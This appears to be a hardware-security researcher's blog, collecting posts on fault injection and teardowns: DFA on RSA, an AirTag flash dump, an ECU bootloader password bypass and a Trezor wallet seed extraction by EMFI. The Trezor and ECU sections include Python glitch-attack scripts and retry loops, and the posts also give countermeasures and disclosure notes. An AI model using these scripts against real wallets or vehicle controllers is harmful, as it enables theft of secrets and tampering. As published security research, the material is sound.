On April 1st, 2022 I gave a “workshop” at New England Hardware Security Day. This blog post is a quick summary of some of the links to recreate my demos from that talk. Here is a copy of the slides if you’d like them:
This demo is pretty simple – it recreates the classic DFA attack on RSA (I find David’s description great here, or you can see my Hardware Hacking Handbook which includes another derivation of it using a different method).
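For reference, the math behind the attack is tiny. Here's a minimal sketch (not the workshop code, just the textbook gcd trick – the function and argument names are mine) of recovering a factor of N from a single faulty RSA-CRT signature:

```python
from math import gcd

def recover_factor(n, e, msg, faulty_sig):
    """Bellcore-style DFA: if a fault corrupted exactly one CRT half of the
    signature, then (faulty_sig**e - msg) shares exactly one prime factor
    with n. Here msg is the (padded) message representative."""
    p = gcd((pow(faulty_sig, e, n) - msg) % n, n)
    return p if 1 < p < n else None  # None: the fault didn't land usefully
```

With p in hand, q = n // p and the rest of the private key follows.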
You can see the full code source in my repo from Hackaday Remoticon 2021. That repo just includes the R-Pi Python side (it also makes reference to voltage glitching, which I showed in the talk as another way to perform the demo).
You’ll need to install a specific version of pycryptodome, along with a library that performs the analysis afterwards.
The actual fault injection in my demo was done with the PicoEMP, a low-cost, open-source EMFI tool. Critically, it doesn’t present the dangerous high-voltage exposure that some other open-source tools inherently do.
Watch out with this demo – it can be annoying, as you crash the R-Pi a lot while dialing it in! And it can take a while to boot, but I guarantee you it will work!
RISC-V Soft-Core
This demo was based on one of the targets that will come with the ChipWhisperer-Husky, an iCE40 based FPGA target.
The soft-core in question is the excellent NEORV32 RISC-V core, which has great documentation. You don’t need to build the core to use the existing design, as the ChipWhisperer repo has a pre-built binary of the FPGA image, so you can just compile software for that image. But it’s fun to build your own core!
This demo uses the ChipWhisperer CW305 board (here in the A35 variant), which has a series of nice ECC jupyter notebook tutorials. These tutorials will walk you through how the entire attack works:
The jupyter labs.
The ECC core is based on the excellent and open-source CrypTech project.
What’s inside of Apple’s new AirTag? There was already an iFixIt teardown (which I swear was missing a few items that are there now), but of course I was curious to see what sort of protection was enabled. Notably, the nRF chip used is likely vulnerable to a known security bypass as well. With that in mind, I set out to see how we could dump some data from this thing. The good news is you can access a lot of interesting stuff (including the SPI flash) right from the backside, which simply requires popping the first plastic cover off – super easy to do without damaging anything. Going further than that while keeping everything intact is tricky.
Apple AirTag with Numbered Test Points
If you want to jump right to the answers, check out my AirTag-RE repo on github where I list the known test points that will be of interest. You can also see my twitter thread where I started the teardown:
OK I didn't appreciate how jam-packed this thing is from @iFixit teardown photos. Also it's 0.3mm PCB so I'm pretty sure I broke some solder joints getting it out. Test pads are accessible w/o removing PCB so if this one isn't working will test another one. pic.twitter.com/KmqGUDWkP6
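If you want to try talking to that SPI flash through the test points, here is a hedged sketch of what a readout could look like. This is an assumption on my part, not from my teardown notes: it assumes an FTDI FT2232H adapter wired to the flash pads (and you’d likely need to hold the nRF in reset so it doesn’t fight you on the bus):

```python
from pyftdi.spi import SpiController

spi = SpiController()
spi.configure('ftdi://ftdi:2232h/1')          # assumed FT2232H adapter on the test pads
flash = spi.get_port(cs=0, freq=1E6, mode=0)

# JEDEC ID (standard command 0x9F) is a good first sanity check of the wiring
print("JEDEC ID:", bytes(flash.exchange([0x9F], 3)).hex())

# Standard READ (command 0x03) with a 24-bit address, pulling the first 4 KB
data = flash.exchange([0x03, 0x00, 0x00, 0x00], 4096)
open('airtag_flash.bin', 'wb').write(bytes(data))
```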
This post is a summary of some work from an accepted paper for ESCAR EU 2020. The work was demonstrated on certain NXP chips & GM ECUs, but the idea of both the attack & understanding how portable the results are is applicable across the entire domain.
NOTE TO CAR TUNERS: I won’t perform this for hire on your ECU, please don’t email me asking. The cost for me to do this type of work for hire would also be many times the HPTuners fee, and without any of the actual tuning interface (I’m only attacking the bootloader – I never built a reflash tool, which would be needed, let alone did the mapping work etc.).
This work was presented as a way to help automotive system designers understand the “real” threat to their systems, something that is hard to do when tuners hide their methods for commercial reasons. While I don’t know if the method I’m presenting is used by the car tuners, I assume some variant of it has been used before (I doubt I’m the “true” discoverer). As I mentioned in the paper, I’m also not the first to apply EMFI to automotive devices in an academic setting (another nice paper ref’d there is the Safety != Security work). One contribution of my work is that it directly talks about practicality, something critical for threat modelling but often skipped because of how messy it is. You can build the attack into a “portable rig”, as shown here in a final demonstration:
Complete attack demonstration showing potential for a fully portable version.
This portable rig is designed to show something along the lines of “pro garage” or “tuner garage” capabilities. It doesn’t need a ton of expertise to execute the attack, and opening up ECUs and probing them is widely done as part of regular tuning already (often called a type of “bench flash”). The real research wasn’t done with the Arduino setup, but instead using ChipWhisperer as part of the triggering with Python scripts searching:
The science version of the hardware lab has a more flexible design.
The Arduino demonstration shown previously is not usable as-is for tuning. It’s very fiddly and hasn’t been optimized, so I can’t productize what was shown there easily (you can tell I get sick of people looking for tuning solutions…).
The attack is possible on these devices because they have a hardware bootloader enabled via a pin on the board. Shorting that pin to GND enters the bootloader mode, at which point the device waits for a password. Using electromagnetic fault injection, you can bypass the password check such that an incorrect password is accepted.
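In spirit, the Python-side search loop looks something like this hedged sketch – enter_bootloader(), arm_glitch(), and the one-byte ACK are all hypothetical placeholders, not the protocol from the paper:

```python
import serial

# enter_bootloader() and arm_glitch() are hypothetical stand-ins for the
# board-specific reset sequence and the ChipWhisperer/EMFI trigger setup.
def try_glitch(port, offset_ns):
    enter_bootloader(port)            # reset with the bootloader pin strapped to GND
    arm_glitch(offset_ns)             # schedule an EMFI pulse at the candidate offset
    port.write(b"\x00" * 8)           # send a deliberately wrong password
    return port.read(1) == b"\x79"    # hypothetical ACK byte: wrong password accepted

with serial.Serial("/dev/ttyUSB0", 115200, timeout=0.5) as port:
    for offset in range(0, 20_000, 50):   # sweep the pulse timing in 50 ns steps
        if try_glitch(port, offset):
            print(f"password check bypassed at {offset} ns")
            break
```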
You can use power analysis to discover some of the timing, as done in the paper. Comparing a good password to a bad password shows a clear point in time where the password logic differs:
Interestingly, you can also see the red “incorrect password” trace appears to spin into an infinite loop (or similar), which would be around cycle 100 on the above figure.
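If you want to reproduce that kind of comparison, a minimal sketch looks like this (assuming good and bad are 2-D numpy arrays of captured power traces – the names and threshold are mine, not from the paper):

```python
import numpy as np

# good, bad: 2-D arrays of power traces (rows = captures, columns = samples),
# recorded with a correct and an incorrect password respectively
diff = np.abs(good.mean(axis=0) - bad.mean(axis=0))
divergence = int(np.argmax(diff > 0.5 * diff.max()))
print("password handling first diverges around sample", divergence)
```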
As an important caveat: EMFI works against almost any microcontroller. Thus there is no “flaw” in the NXP MCU or GM usage of it, many other devices can be attacked using this same technique. The NXP MCU has long-term support (meaning it sticks around 15+ years), and was designed long before fault injection was on the radar of these devices as a realistic threat.
I recently tore down a Square Terminal (the one with the LCD screen) and wanted to share some of the results. I haven’t photographed everything, as I was mostly interested in how the secure areas of it are done. You can see an overview in the following video if you want to see how the whole thing fits together.
Teardown of Square Terminal Video
You can pull the main boards out to boot the thing on your bench (WARNING: as you see in the video above, this will trip the tamper circuits and permanently stop the device from being able to register/be used):
Benching the boards – tamper shield removed from secure device (more on that later).
To start with the boring part, here is the Android board. It uses an APQ8039 (Snapdragon 615) as the main processor, with a KMQE60013M-B318, which integrates NAND (eMMC) and LPDDR in one package.
Alright, cool enough? Well, let’s get into the main stuff. There is a “security board”, which I talk about in the following video:
This board features an MK21FX512 main microcontroller, a TDA9034 smartcard interface, a “Square K400Q”, a Cirque ICA037 touch controller, an STM32F0, a TS3A44159RGTR (analog mux), and a Lattice ICE5LP2K FPGA. Here’s a photo of the board with the tamper screen removed:
The tamper shield covers all of those test pads. Here’s a photo of the tamper screen:
Very conveniently (for us), Square has filed a number of patents related to the tamper. In particular, here and here feature this exact cover:
I had measured out the connections, but the patent itself detailed them:
The patent also explains the land patterns on the PCB. The extra rings around them are guard rings – if someone were to squirt some conductive glue into the enclosure, they would also trip the guard ring. Cool!
The other question is what the Square K400Q device, which has a 13.56 MHz crystal hanging off it, actually is. Well, it turns out Square acquired a company called Kili Technology. And Kili Technology had a product called the K400Q, which is also in a QFN-56 package. You can find the product page here (thanks to archive.org). There’s no full datasheet, but it does have a short product brief:
What else is in it? Unclear exactly, but I would bet it’s using an enSilica RISC processor based on this press release. Unfortunately there aren’t public tools for it, although Lauterbach supports it in some form.
Finally – where is that security mesh handled? In my video I trace out some of it – the backup battery seems to run across the mesh on one side. The other side seems to route to the STM32F0 processor. So it might be that the STM32F0 is performing some of the security mesh checking, which then triggers the Secure Destroy Interface (SDI) on the Square K400Q microcontroller. The STM32F0 has some epoxy blocking a few pins (very suspicious), as does the analog mux. The analog mux has some interesting-looking signals on it that make me suspect it is also part of the security mesh.
As a small side-note: all those test pads are right at the edge of the mesh. I haven’t tested yet, but I’m curious if you can dig down ‘under’ the shield without tripping anything. Or a very very fine shim may fit between the PCB & shield perhaps. Lots of stuff to test!
But that’s all for now. Project has been shelved for a bit, but hopefully you enjoy this look into the Square teardown!
MINOR UPDATE: I removed the epoxy around the STM32F0 – it looks like it might be near the mesh, but the mesh isn’t actually routing to the STM32F0 inputs (not 100% clear yet). The mesh seems to carry the backup power for the MK21 instead, so it’s clear more effort is needed. The next step will be to remove the BGA on the MK21 so I can probe where the mesh is going exactly.
Have you been interested in the Echo Dot device? One feature they mention is the microphone-off button. I spent a few hours reverse engineering this, and recorded the process (in unedited glory):
The resulting schematic is shown below:
The astute reader will note the only pin under direct control allows disabling the microphone; it cannot re-enable it. However – there is one more loophole to check.
The microphone comes up in an “online” state due to the strapping circuit. On a quick check, it appears the 3.3V source comes directly from a main 3.3V regulator, which doesn’t seem to be controlled by the microcontroller. But I don’t guarantee there isn’t some way for the microcontroller to turn off that entire supply, which if so would cause the microphone to be re-enabled when the device turns back on. It’s the last thing I’ll investigate, but it will take some more effort to do so.
At CHES 2019 [rump session], I presented my revolutionary talk on Time Travel Resistant Cryptography (TTRC). This is a hugely important area of research that has been widely ignored in academic work, and it’s time to finally make this right.
Why is this so critical? While Post Quantum Cryptography (PQC) gets NIST contests and invested companies, nobody is considering TTRC. The general thought process of PQC is that the existence of sufficiently powerful quantum computers is an open problem with no clear solution. BUT – if someone solves that problem (one that isn’t even clearly physically possible to solve), it’s going to be hell on Earth for crypto implementations. Better safe than sorry.
That sounds a hell of a lot like some other problems to me.
And that problem has even had multiple movies made about it:
Lots of open questions exist. But note that many of them are not so unreasonable. For example – what if time travel requires us to create a Closed Timelike Curve (CTC), and time travel is only possible from the point that curve is created onward?
This would mean that from the point the CTC is created, crypto would immediately be broken, but any point before that (i.e., now) is safe. Thus we must create TTRC implementations now, since we cannot know when CTCs could be created.
I discuss many of these problems in my CHES 2019 rump presentation; you can see the slides below. When the video is posted I’ll update this blog post with it.
This blog post covers several topics that I should have made independent posts about… but anyway. Here we are. It’s September and I should have done this months ago.
Trezor / USB Hacking Updates (Black Hat + WOOT)
I had an earlier blog post with details of the Trezor attack. It turns out this is a more generic type of attack than I realized, so I extended the work into a WOOT paper as well, and thought I should post a quick update on that…
This paper includes some additional details. One major thing is that the USB attack I used on the Trezor applies to many other devices. Basically, almost everything has something like the following chunk of code:
if (*length > setup->wLength) {
    *length = setup->wLength;
}
The problem comes about because the wLength field ends up coming from the computer (host). Using fault injection we can always cause that code-path to be taken, meaning we can read out data directly from the target device. This only applies in certain circumstances… here is a quick flow-chart of when you should care:
As mentioned on the Trezor blog post, their latest security patch fixes a flaw I disclosed to them in Jan 2019. This flaw meant an attacker with physical access to the wallet can find the recovery seed stored in FLASH, and leave no evidence of tampering.
This work was heavily inspired by the wallet.fail disclosure – I’m directly dumping FLASH instead of forcing the flash erase then dumping from SRAM, so the results are the same but with a different path. It also has the same limitations – if you used a password protected recovery seed you can’t dump that.
Practically, it has the advantage of not requiring you to modify/tamper with the enclosure at all, either to do the fault injection or to read data off. Wallet.fail uses the physical JTAG connection, whereas I’m using the USB connection. But by comparison the wallet.fail attack is more robust and easier to apply – my EMFI attack can be fiddly to set up, and there is some inherent timing jitter due to the USB stack processing. Without further effort to speed up my attack, it’s likely the process of opening the enclosure & applying the wallet.fail method would be faster in practice.
Please do not contact me if you have a “forgotten password” or something similar with your Trezor. I’m not willing to perform this work under any circumstances.
Summary
USB requests that read from memory (such as a USB descriptor read) accept a maximum packet size that is MIN(requested_size, size_of_data_structure). The code as written defaults to accepting the requested size, and overwriting it with a smaller “valid” value.
Using fault injection (here demo’d with EMFI), this check can be skipped. The device will accept up to 0xFFFF as a size argument, giving an attacker access to read large chunks of either SRAM or FLASH (depending where the descriptor is stored).
Due to the FLASH memory layout, the sensitive metadata lies roughly AFTER the descriptors stored in bootloader flash space. Thus an attacker can read out the metadata structure from memory (seed etc). Notably, this does not require one to open the enclosure, due to the use of EMFI.
Using voltage glitching would almost certainly work as well, but likely requires opening the enclosure, making tampering more evident (possibly it would even work via the USB +5V input, which wouldn’t require opening the enclosure).
Details
I’ve chosen to demo this with WinUSB descriptor requests, as they have a very simple structure. In addition, WinUSB has one descriptor in FLASH and one in SRAM, giving you the ability to choose which memory segment to dump. Other USB requests should work too, but I haven’t tested them.
Consider the following function, where the critical calls are the *len = MIN(*len, …) calls (two of them can be found):
static int winusb_control_vendor_request(usbd_device *usbd_dev,
                                         struct usb_setup_data *req,
                                         uint8_t **buf, uint16_t *len,
                                         usbd_control_complete_callback *complete) {
    (void)complete;
    (void)usbd_dev;

    if (req->bRequest != WINUSB_MS_VENDOR_CODE) {
        return USBD_REQ_NEXT_CALLBACK;
    }

    int status = USBD_REQ_NOTSUPP;
    if (((req->bmRequestType & USB_REQ_TYPE_RECIPIENT) == USB_REQ_TYPE_DEVICE) &&
        (req->wIndex == WINUSB_REQ_GET_COMPATIBLE_ID_FEATURE_DESCRIPTOR)) {
        *buf = (uint8_t *)(&winusb_wcid);
        *len = MIN(*len, winusb_wcid.header.dwLength); /* length clamp #1 - glitch target */
        status = USBD_REQ_HANDLED;
    } else if (((req->bmRequestType & USB_REQ_TYPE_RECIPIENT) == USB_REQ_TYPE_INTERFACE) &&
               (req->wIndex == WINUSB_REQ_GET_EXTENDED_PROPERTIES_OS_FEATURE_DESCRIPTOR) &&
               (usb_descriptor_index(req->wValue) == winusb_wcid.functions[0].bInterfaceNumber)) {
        *buf = (uint8_t *)(&guid);
        *len = MIN(*len, guid.header.dwLength); /* length clamp #2 - glitch target */
        status = USBD_REQ_HANDLED;
    } else {
        status = USBD_REQ_NOTSUPP;
    }
    return status;
}
We can see from the disassembly this is a simple comparison to the maximum size. I’m mostly going to be looking at the guid structure, since it’s located in FLASH below the metadata. Glitching the code in the red box below would create our required vulnerability:
The glitch is inserted with a ChipSHOUTER EMFI tool. The Trezor is held in bootloader mode with two spacers on the buttons, and the EMFI tool is positioned above the case, as shown below:
The entire setup is shown below, which has the ChipSHOUTER (bottom left), a ChipWhisperer-Lite (top left) for trigger delay, a Beagle 480 for USB sniffing/triggering (top center), and a switchable USB hub to power-cycle the Trezor when the EMFI triggers the various hard fault/stack smashing/memory corruption errors (top right).
The forced bootloader entry mode simplifies the glitch, as we can freely power cycle the device and try many glitches.
A glitch is timed based on a Total Phase USB analyzer. The USB request is sent from a host computer as shown below:
def get_winusb(dev, scope):
    """WinUSB Request is most useful for glitch attack"""
    scope.io.glitch_lp = True  #Enable glitch (actual trigger comes from Total Phase USB Analyzer)
    scope.arm()
    resp = dev.ctrl_transfer(int('11000001', 2), ord('!'), 0x0, 0x05, 0xFFFF, timeout=1)
    resp = list(resp)
    scope.io.glitch_lp = False  #Disable glitch
    return resp
This corresponds to reading the “guid”. The Beagle480 is set up to generate a trigger on the first two bytes of this request:
To confirm the timing, I also compiled my own bootloader, and saw the sensitive operation was typically occurring 4.2 to 5.7uS after the Beagle480 trigger. There was some jitter due to the USB stack processing.
A ChipWhisperer-Lite is then used to generate a 4.4uS offset (empirically a good “waiting” place), after which an EMFI pulse is triggered. Should the 4.4uS offset happen to line up with the length checking/limiting, we can get a successful glitch.
A successful glitch will return much more data than expected – possibly up to the full 0xFFFF, though because things are getting corrupted it sometimes seems to be less. Also, some OSes limit the maximum size you can request – you can find some references to that on the libusb mailing list. As a first step you might just try 0x1FF or something (anything larger than the correct 0x92 response). But here is a screen-shot showing three correct transfers (146 bytes transferred) followed by an incorrect one, which dumped 24,800 bytes:
Here is an example of the metadata from another dump (this doesn’t correspond to the screen-shot above). Note I never set a PIN on this one, as I had damaged the screen – the first device I tested with was being used for development as well:
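For completeness, the outer search loop is just retry-until-lucky. A hedged sketch of what mine effectively did (power_cycle() is a hypothetical stand-in for toggling the switchable hub port and re-enumerating the device):

```python
import usb.core

EXPECTED = 0x92   # 146 bytes: the length of a correct guid transfer

while True:
    try:
        resp = get_winusb(dev, scope)   # the function from the listing above
    except usb.core.USBError:
        dev = power_cycle()             # hypothetical: hub port off/on, re-enumerate
        continue
    if len(resp) > EXPECTED:
        break                           # length check skipped: extra memory dumped
```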
Simulating the Glitch
Note you can “simulate” this glitch by simply commenting out the length-checking operation in the WinUSB request. This allows you to confirm that, should that operation be skipped, you can dump large chunks of memory including the metadata.
This simulation could be useful in validating some of the proposed fixes as well (I would highly suggest doing such testing as part of regular builds).
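For example, a host-side regression test against the simulated (or patched) build might look something like this hedged pyusb sketch – dev is assumed to be the pyusb handle for the device under test:

```python
def test_winusb_length_clamped(dev):
    # Same request as the attack: WinUSB vendor request with wLength = 0xFFFF
    # (0xC1 is the bmRequestType used in the attack script above)
    resp = dev.ctrl_transfer(0xC1, ord('!'), 0x0, 0x05, 0xFFFF, timeout=100)
    assert len(resp) <= 0x92, "descriptor read returned more than the real structure"
```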
Reliability Notes
Note that due to the timing jitter, the glitch is very unreliable (<0.1% success rate); however, this typically translates to taking a few hours, due to how quickly the search can be done. So it remains extremely practical, since it seems reasonable for an attacker to have access to a wallet for a few hours.
I suspect this could be improved by doing the USB request from an embedded system (something like a GreatFET), which would allow me to synchronize to the internal state of the Trezor. The operation would then be:
1. Send a USB request (get descriptor etc.).
2. After that request comes back, send our WinUSB/glitch target request at a very precisely defined amount of time later.
3. Insert the glitch.
Simple Fixes / Countermeasures
1) The low-level USB functions should enforce some absolute maximum size. For example, if you only ever do 64-byte transfers, never allow a larger transfer to occur – mask the upper bits to force them to zero. Do this in multiple spots to make glitching past it more difficult.
2) The metadata needs to be guarded by invalid memory segments. A read that runs from a valid segment toward the metadata should hit an invalid segment first, causing an exception.
3) Rearrange the descriptor/metadata layout (less useful than #2 in practice).
Conclusions
EMFI is a simple way of abusing the USB stack in the Trezor. You’ll find a similar vulnerability in a number of USB stacks, meaning this type of attack should be something you validate against in your own devices.
More details of this example will be available in the book Jasper & I are working on for (eventual?) release.